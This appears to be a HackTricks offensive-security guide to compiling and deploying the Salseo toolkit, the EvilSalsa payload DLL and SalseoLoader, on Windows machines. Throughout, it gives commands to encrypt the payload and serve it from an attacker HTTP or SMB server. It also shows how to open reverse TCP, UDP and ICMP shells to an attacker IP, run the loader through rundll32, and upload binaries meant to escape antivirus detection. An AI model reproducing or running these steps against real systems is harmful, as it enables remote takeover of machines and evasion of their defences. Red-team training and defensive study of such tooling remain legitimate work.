{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Download the source code from the github and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.
Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).
You can select the architecture inside Visual Studio in the left "Build" Tab in "Platform Target".
(**If you can't find this options press in "Project Tab" and then in "<Project Name> Properties")
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
First of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssembly:
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, now you have everything you need to execute all the Salseo thing: the encoded EvilDalsa.dll and the binary of SalseoLoader.
Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
This time you need a special tool in the client to receive the reverse shell. Download: https://github.com/inquisb/icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Open the SalseoLoader project using Visual Studio.
In your project folder have appeared the files: DllExport.bat and DllExport_Configure.bat
Press Uninstall (yeah, its weird but trust me, it is necessary)
Just exit Visual Studio
Then, go to your SalseoLoader folder and execute DllExport_Configure.bat
Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply
[DllExport] should not be longer marked as error
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
To build the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
Copy and paste the Dll where you want to test it.
Execute:
rundll32.exe SalseoLoader.dll,main
If no error appears, probably you have a functional DLL!!
Don't forget to use a HTTP server and set a nc listener
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.